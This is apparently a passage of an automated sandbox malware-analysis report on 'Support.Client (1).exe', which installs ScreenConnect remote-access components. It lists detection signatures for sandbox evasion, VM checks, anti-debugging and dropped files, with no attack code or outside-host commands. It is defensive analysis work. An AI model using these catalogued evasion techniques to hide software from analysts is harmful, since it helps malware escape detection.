Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 1EC9E390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 1ECB7D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Memory allocated: 1770000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Memory allocated: 1B250000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Memory allocated: 1690000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Memory allocated: 3060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Memory allocated: 5060000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Memory allocated: BA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Memory allocated: 13A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Memory allocated: 33A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Memory allocated: CE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Memory allocated: 1A940000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Memory allocated: F10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Memory allocated: 1ADA0000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 1505	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 393	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 2616	Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..dows_4b14c015c87c1ad8_0018.0003_none_57acc9dd3adfc036\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..vice_4b14c015c87c1ad8_0018.0003_none_04888a4494511071\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..core_4b14c015c87c1ad8_0018.0003_none_5334f1fbfe91ad06\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..ient_4b14c015c87c1ad8_0018.0003_none_e94a4fce0de1030a\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\H8JD4A0C.MYR\2Z9VVAJ8.DY1\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre...exe_25b0fbb6ef7eb094_0018.0003_none_97cb907042c6ab92\ScreenConnect.WindowsFileManager.exe	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Support.Client (1).exe TID: 6920	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6172	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 5936	Thread sleep time: -130800s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6172	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 3180	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2308	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe TID: 2056	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe TID: 3748	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe TID: 3964	Thread sleep time: -922337203685477s >= -30000s

Queries disk information (often used to detect virtual machines)

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Users\user\Desktop\Support.Client (1).exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Support.Client (1).exe	Thread delayed: delay time: 40000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File opened: C:\Users\user\	Jump to behavior

Source: Amcache.hve.12.dr	Binary or memory string: VMware
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.12.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.12.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.12.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: dfsvc.exe, 00000001.00000002.3524248459.000001ECB8710000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3530611036.000001ECBA2AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3289932053.00000224B665A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.12.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: dfsvc.exe, 00000001.00000002.3530611036.000001ECBA226000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW*
Source: Amcache.hve.12.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: svchost.exe, 00000002.00000002.3289337255.00000224B102B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: Amcache.hve.12.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: ScreenConnect.ClientService.exe, 00000008.00000002.3503090056.0000000000A00000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.12.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.12.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.12.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.12.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.12.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.12.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.12.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.12.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.12.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.12.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\Support.Client (1).exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Support.Client (1).exe	Process queried: DebugPort			Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\Support.Client (1).exe

Code function: 0_2_00424573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00424573

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\Support.Client (1).exe

0_2_00421000

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\Support.Client (1).exe

Code function: 0_2_00423677 mov eax, dword ptr fs:[00000030h]

0_2_00423677

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\Support.Client (1).exe

Code function: 0_2_00426893 GetProcessHeap,

0_2_00426893

Enables debug privileges

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\2P970BCK.DL9\B46MR3KJ.37L\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process token adjusted: Debug			Jump to behavior

Launches processes in debugging mode, may be used to hinder debugging

Source: C:\Users\user\Desktop\Support.Client (1).exe

Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Support.Client (1).exe	Code function: 0_2_00421493 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00421493
Source: C:\Users\user\Desktop\Support.Client (1).exe	Code function: 0_2_00424573 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00424573
Source: C:\Users\user\Desktop\Support.Client (1).exe	Code function: 0_2_0042191F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042191F
Source: C:\Users\user\Desktop\Support.Client (1).exe	Code function: 0_2_00421AAC SetUnhandledExceptionFilter,	0_2_00421AAC

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT \| WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
Source: ScreenConnect.Windows.dll.1.dr, WindowsMemoryNativeLibrary.cs	Reference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
